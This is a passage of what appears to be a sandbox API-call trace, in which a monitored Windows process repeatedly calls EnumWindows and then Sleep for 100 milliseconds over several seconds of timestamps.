(dwMilliseconds=0x64) [0251.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.607] Sleep (dwMilliseconds=0x64) [0251.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.611] Sleep (dwMilliseconds=0x64) [0251.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.614] Sleep (dwMilliseconds=0x64) [0251.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.617] Sleep (dwMilliseconds=0x64) [0251.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.626] Sleep (dwMilliseconds=0x64) [0251.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.628] Sleep (dwMilliseconds=0x64) [0251.631] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.631] Sleep (dwMilliseconds=0x64) [0251.633] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.633] Sleep (dwMilliseconds=0x64) [0251.635] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.636] Sleep (dwMilliseconds=0x64) [0251.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.641] Sleep (dwMilliseconds=0x64) [0251.643] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.643] Sleep (dwMilliseconds=0x64) [0251.661] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.661] Sleep (dwMilliseconds=0x64) [0251.685] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.686] Sleep (dwMilliseconds=0x64) [0251.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.758] Sleep (dwMilliseconds=0x64) [0251.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.833] Sleep (dwMilliseconds=0x64) [0251.937] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0251.937] Sleep (dwMilliseconds=0x64) [0252.012] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.012] Sleep (dwMilliseconds=0x64) [0252.064] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.064] Sleep (dwMilliseconds=0x64) [0252.105] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.105] Sleep (dwMilliseconds=0x64) [0252.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.343] Sleep (dwMilliseconds=0x64) [0252.402] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.403] Sleep (dwMilliseconds=0x64) [0252.443] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.444] Sleep (dwMilliseconds=0x64) [0252.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.482] Sleep (dwMilliseconds=0x64) [0252.565] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.565] Sleep (dwMilliseconds=0x64) [0252.641] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.641] Sleep (dwMilliseconds=0x64) [0252.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.758] Sleep (dwMilliseconds=0x64) [0252.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.839] Sleep (dwMilliseconds=0x64) [0252.919] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.922] Sleep (dwMilliseconds=0x64) [0252.969] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0252.969] Sleep (dwMilliseconds=0x64) [0253.005] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.005] Sleep (dwMilliseconds=0x64) [0253.008] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.009] Sleep (dwMilliseconds=0x64) [0253.012] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.012] Sleep (dwMilliseconds=0x64) [0253.019] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.020] Sleep (dwMilliseconds=0x64) [0253.023] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.023] Sleep (dwMilliseconds=0x64) [0253.026] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.027] Sleep (dwMilliseconds=0x64) [0253.031] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.032] Sleep (dwMilliseconds=0x64) [0253.036] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.036] Sleep (dwMilliseconds=0x64) [0253.051] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.052] Sleep (dwMilliseconds=0x64) [0253.056] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.057] Sleep (dwMilliseconds=0x64) [0253.059] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.059] Sleep (dwMilliseconds=0x64) [0253.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.062] Sleep (dwMilliseconds=0x64) [0253.065] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.065] Sleep (dwMilliseconds=0x64) [0253.068] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.068] Sleep (dwMilliseconds=0x64) [0253.072] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.073] Sleep (dwMilliseconds=0x64) [0253.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.075] Sleep (dwMilliseconds=0x64) [0253.078] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.078] Sleep (dwMilliseconds=0x64) [0253.085] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.085] Sleep (dwMilliseconds=0x64) [0253.090] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.090] Sleep (dwMilliseconds=0x64) [0253.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.092] Sleep (dwMilliseconds=0x64) [0253.097] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.097] Sleep (dwMilliseconds=0x64) [0253.102] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.103] Sleep (dwMilliseconds=0x64) [0253.141] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.142] Sleep (dwMilliseconds=0x64) [0253.205] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.206] Sleep (dwMilliseconds=0x64) [0253.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.262] Sleep (dwMilliseconds=0x64) [0253.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.306] Sleep (dwMilliseconds=0x64) [0253.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.343] Sleep (dwMilliseconds=0x64) [0253.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.386] Sleep (dwMilliseconds=0x64) [0253.504] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.504] Sleep (dwMilliseconds=0x64) [0253.545] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.545] Sleep (dwMilliseconds=0x64) [0253.561] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.562] Sleep (dwMilliseconds=0x64) [0253.567] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.567] Sleep (dwMilliseconds=0x64) [0253.570] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.570] Sleep (dwMilliseconds=0x64) [0253.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.573] Sleep (dwMilliseconds=0x64) [0253.578] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.579] Sleep (dwMilliseconds=0x64) [0253.581] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.581] Sleep (dwMilliseconds=0x64) [0253.584] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.585] Sleep (dwMilliseconds=0x64) [0253.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.587] Sleep (dwMilliseconds=0x64) [0253.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.595] Sleep (dwMilliseconds=0x64) [0253.597] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.597] Sleep (dwMilliseconds=0x64) [0253.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.600] Sleep (dwMilliseconds=0x64) [0253.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.612] Sleep (dwMilliseconds=0x64) [0253.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.614] Sleep (dwMilliseconds=0x64) [0253.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.617] Sleep (dwMilliseconds=0x64) [0253.619] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.620] Sleep (dwMilliseconds=0x64) [0253.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.623] Sleep (dwMilliseconds=0x64) [0253.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.626] Sleep (dwMilliseconds=0x64) [0253.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.629] Sleep (dwMilliseconds=0x64) [0253.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.639] Sleep (dwMilliseconds=0x64) [0253.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.641] Sleep (dwMilliseconds=0x64) [0253.642] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.643] Sleep (dwMilliseconds=0x64) [0253.647] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.647] Sleep (dwMilliseconds=0x64) [0253.651] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.651] Sleep (dwMilliseconds=0x64) [0253.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.658] Sleep (dwMilliseconds=0x64) [0253.661] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.661] Sleep (dwMilliseconds=0x64) [0253.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.702] Sleep (dwMilliseconds=0x64) [0253.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.740] Sleep (dwMilliseconds=0x64) [0253.777] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.778] Sleep (dwMilliseconds=0x64) [0253.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.817] Sleep (dwMilliseconds=0x64) [0253.855] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.855] Sleep (dwMilliseconds=0x64) [0253.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.897] Sleep (dwMilliseconds=0x64) [0253.935] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.935] Sleep (dwMilliseconds=0x64) [0253.938] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.938] Sleep (dwMilliseconds=0x64) [0253.940] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.941] Sleep (dwMilliseconds=0x64) [0253.943] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.943] Sleep (dwMilliseconds=0x64) [0253.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.952] Sleep (dwMilliseconds=0x64) [0253.958] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.958] Sleep (dwMilliseconds=0x64) [0253.960] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.960] Sleep (dwMilliseconds=0x64) [0253.964] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.964] Sleep (dwMilliseconds=0x64) [0253.966] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.967] Sleep (dwMilliseconds=0x64) [0253.969] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.969] Sleep (dwMilliseconds=0x64) [0253.980] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.980] Sleep (dwMilliseconds=0x64) [0253.983] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.983] Sleep (dwMilliseconds=0x64) [0253.986] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.986] Sleep (dwMilliseconds=0x64) [0253.988] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.989] Sleep (dwMilliseconds=0x64) [0253.995] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.996] Sleep (dwMilliseconds=0x64) [0253.998] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0253.998] Sleep (dwMilliseconds=0x64) [0254.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.001] Sleep (dwMilliseconds=0x64) [0254.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.007] Sleep (dwMilliseconds=0x64) [0254.010] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.011] Sleep (dwMilliseconds=0x64) [0254.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.013] Sleep (dwMilliseconds=0x64) [0254.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.015] Sleep (dwMilliseconds=0x64) [0254.019] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.019] Sleep (dwMilliseconds=0x64) [0254.021] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.021] Sleep (dwMilliseconds=0x64) [0254.023] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.023] Sleep (dwMilliseconds=0x64) [0254.026] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.026] Sleep (dwMilliseconds=0x64) [0254.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.033] Sleep (dwMilliseconds=0x64) [0254.081] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.082] Sleep (dwMilliseconds=0x64) [0254.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.122] Sleep (dwMilliseconds=0x64) [0254.176] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.176] Sleep (dwMilliseconds=0x64) [0254.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.217] Sleep (dwMilliseconds=0x64) [0254.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.254] Sleep (dwMilliseconds=0x64) [0254.294] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.295] Sleep (dwMilliseconds=0x64) [0254.300] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.300] Sleep (dwMilliseconds=0x64) [0254.309] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.309] Sleep (dwMilliseconds=0x64) [0254.314] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.314] Sleep (dwMilliseconds=0x64) [0254.320] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.320] Sleep (dwMilliseconds=0x64) [0254.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.324] Sleep (dwMilliseconds=0x64) [0254.325] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.326] Sleep (dwMilliseconds=0x64) [0254.329] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.329] Sleep (dwMilliseconds=0x64) [0254.331] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.331] Sleep (dwMilliseconds=0x64) [0254.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.334] Sleep (dwMilliseconds=0x64) [0254.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.336] Sleep (dwMilliseconds=0x64) [0254.340] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.340] Sleep (dwMilliseconds=0x64) [0254.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.342] Sleep (dwMilliseconds=0x64) [0254.344] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.344] Sleep (dwMilliseconds=0x64) [0254.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.350] Sleep (dwMilliseconds=0x64) [0254.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.358] Sleep (dwMilliseconds=0x64) [0254.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.362] Sleep (dwMilliseconds=0x64) [0254.365] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.366] Sleep (dwMilliseconds=0x64) [0254.370] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.370] Sleep (dwMilliseconds=0x64) [0254.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.372] Sleep (dwMilliseconds=0x64) [0254.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.374] Sleep (dwMilliseconds=0x64) [0254.379] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.382] Sleep (dwMilliseconds=0x64) [0254.384] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.384] Sleep (dwMilliseconds=0x64) [0254.389] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.389] Sleep (dwMilliseconds=0x64) [0254.390] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.391] Sleep (dwMilliseconds=0x64) [0254.393] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.394] Sleep (dwMilliseconds=0x64) [0254.397] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.397] Sleep (dwMilliseconds=0x64) [0254.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.400] Sleep (dwMilliseconds=0x64) [0254.446] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.446] Sleep (dwMilliseconds=0x64) [0254.490] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.490] Sleep (dwMilliseconds=0x64) [0254.533] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.533] Sleep (dwMilliseconds=0x64) [0254.572] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.572] Sleep (dwMilliseconds=0x64) [0254.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.596] Sleep (dwMilliseconds=0x64) [0254.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.600] Sleep (dwMilliseconds=0x64) [0254.606] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.606] Sleep (dwMilliseconds=0x64) [0254.608] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.608] Sleep (dwMilliseconds=0x64) [0254.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.614] Sleep (dwMilliseconds=0x64) [0254.653] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.654] Sleep (dwMilliseconds=0x64) [0254.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.657] Sleep (dwMilliseconds=0x64) [0254.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.660] Sleep (dwMilliseconds=0x64) [0254.662] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.662] Sleep (dwMilliseconds=0x64) [0254.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.666] Sleep (dwMilliseconds=0x64) [0254.670] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.670] Sleep (dwMilliseconds=0x64) [0254.672] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.673] Sleep (dwMilliseconds=0x64) [0254.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.676] Sleep (dwMilliseconds=0x64) [0254.678] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.678] Sleep (dwMilliseconds=0x64) [0254.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.683] Sleep (dwMilliseconds=0x64) [0254.686] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.686] Sleep (dwMilliseconds=0x64) [0254.689] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.690] Sleep (dwMilliseconds=0x64) [0254.695] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.695] Sleep (dwMilliseconds=0x64) [0254.745] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.745] Sleep (dwMilliseconds=0x64) [0254.784] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.785] Sleep (dwMilliseconds=0x64) [0254.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.820] Sleep (dwMilliseconds=0x64) [0254.823] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.824] Sleep (dwMilliseconds=0x64) [0254.826] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.826] Sleep (dwMilliseconds=0x64) [0254.831] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.831] Sleep (dwMilliseconds=0x64) [0254.835] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.835] Sleep (dwMilliseconds=0x64) [0254.837] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.837] Sleep (dwMilliseconds=0x64) [0254.839] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.839] Sleep (dwMilliseconds=0x64) [0254.842] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.842] Sleep (dwMilliseconds=0x64) [0254.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.846] Sleep (dwMilliseconds=0x64) [0254.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.849] Sleep (dwMilliseconds=0x64) [0254.852] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.852] Sleep (dwMilliseconds=0x64) [0254.856] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.856] Sleep (dwMilliseconds=0x64) [0254.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.862] Sleep (dwMilliseconds=0x64) [0254.869] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.869] Sleep (dwMilliseconds=0x64) [0254.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.871] Sleep (dwMilliseconds=0x64) [0254.877] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.877] Sleep (dwMilliseconds=0x64) [0254.880] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.880] Sleep (dwMilliseconds=0x64) [0254.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.884] Sleep (dwMilliseconds=0x64) [0254.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.886] Sleep (dwMilliseconds=0x64) [0254.888] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.888] Sleep (dwMilliseconds=0x64) [0254.891] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.891] Sleep (dwMilliseconds=0x64) [0254.895] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.895] Sleep (dwMilliseconds=0x64) [0254.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.897] Sleep (dwMilliseconds=0x64) [0254.902] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.902] Sleep (dwMilliseconds=0x64) [0254.905] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.905] Sleep (dwMilliseconds=0x64) [0254.907] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.908] Sleep (dwMilliseconds=0x64) [0254.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.910] Sleep (dwMilliseconds=0x64) [0254.919] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.919] Sleep (dwMilliseconds=0x64) [0254.957] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0254.958] Sleep (dwMilliseconds=0x64) [0255.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.050] Sleep (dwMilliseconds=0x64) [0255.077] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.077] Sleep (dwMilliseconds=0x64) [0255.080] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.080] Sleep (dwMilliseconds=0x64) [0255.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.083] Sleep (dwMilliseconds=0x64) [0255.089] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.089] Sleep (dwMilliseconds=0x64) [0255.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.092] Sleep (dwMilliseconds=0x64) [0255.097] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.097] Sleep (dwMilliseconds=0x64) [0255.310] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.311] Sleep (dwMilliseconds=0x64) [0255.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.353] Sleep (dwMilliseconds=0x64) [0255.419] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.419] Sleep (dwMilliseconds=0x64) [0255.453] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.453] Sleep (dwMilliseconds=0x64) [0255.477] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.478] Sleep (dwMilliseconds=0x64) [0255.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.497] Sleep (dwMilliseconds=0x64) [0255.500] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.500] Sleep (dwMilliseconds=0x64) [0255.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.508] Sleep (dwMilliseconds=0x64) [0255.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.512] Sleep (dwMilliseconds=0x64) [0255.518] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.520] Sleep (dwMilliseconds=0x64) [0255.522] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.523] Sleep (dwMilliseconds=0x64) [0255.525] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.525] Sleep (dwMilliseconds=0x64) [0255.529] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.529] Sleep (dwMilliseconds=0x64) [0255.533] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.533] Sleep (dwMilliseconds=0x64) [0255.535] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.536] Sleep (dwMilliseconds=0x64) [0255.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.541] Sleep (dwMilliseconds=0x64) [0255.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.545] Sleep (dwMilliseconds=0x64) [0255.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.547] Sleep (dwMilliseconds=0x64) [0255.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.550] Sleep (dwMilliseconds=0x64) [0255.556] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.557] Sleep (dwMilliseconds=0x64) [0255.595] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.596] Sleep (dwMilliseconds=0x64) [0255.637] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.638] Sleep (dwMilliseconds=0x64) [0255.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.668] Sleep (dwMilliseconds=0x64) [0255.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.674] Sleep (dwMilliseconds=0x64) [0255.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.677] Sleep (dwMilliseconds=0x64) [0255.678] 